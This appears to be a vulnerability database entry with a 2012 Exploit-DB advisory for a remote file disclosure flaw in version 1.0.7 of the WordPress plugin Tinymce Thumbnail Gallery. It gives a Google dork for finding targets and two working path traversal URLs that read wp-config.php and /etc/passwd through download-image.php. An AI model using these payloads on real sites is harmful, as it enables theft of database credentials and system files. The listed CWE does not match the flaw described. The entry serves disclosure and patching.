Wordpress Plugins - Tinymce Thumbnail Gallery Remote File Disclosure Vulnerability

vendor:

Tinymce Thumbnail Gallery

by:

Sammy FORGIT

7,5

CVSS

HIGH

Remote File Disclosure

434

CWE

Product Name: Tinymce Thumbnail Gallery

Affected Version From: 1.0.7

Affected Version To: 1.0.7

Patch Exists: YES

Related CWE: N/A

CPE: a:wordpress:tinymce_thumbnail_gallery

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2012

WordPress Plugins – Tinymce Thumbnail Gallery Remote File Disclosure Vulnerability

A vulnerability in the Tinymce Thumbnail Gallery plugin for Wordpress allows an attacker to download arbitrary files from the server. This is due to the download-image.php script in the plugin not properly validating user-supplied input. An attacker can craft a URL to download any file from the server, such as the wp-config.php or /etc/passwd file.

Mitigation:

Upgrade to the latest version of the Tinymce Thumbnail Gallery plugin for Wordpress.

Source

Exploit-DB raw data:

##################################################
# Description : Wordpress Plugins - Tinymce Thumbnail Gallery Remote 
File Disclosure Vulnerability
# Version : 1.0.7
# Link : http://wordpress.org/extend/plugins/tinymce-thumbnail-gallery/
# Plugins : 
http://downloads.wordpress.org/plugin/tinymce-thumbnail-gallery.zip
# Date : 25-05-2012
# Google Dork : inurl:/wp-content/plugins/tinymce-thumbnail-gallery/
# Author : Sammy FORGIT - sam at opensyscom dot fr - 
http://www.opensyscom.fr
##################################################


Exploit :

http://www.exemple.com/wordpress/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php

http://www.exemple.com/wordpress/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../../../../../etc/passwd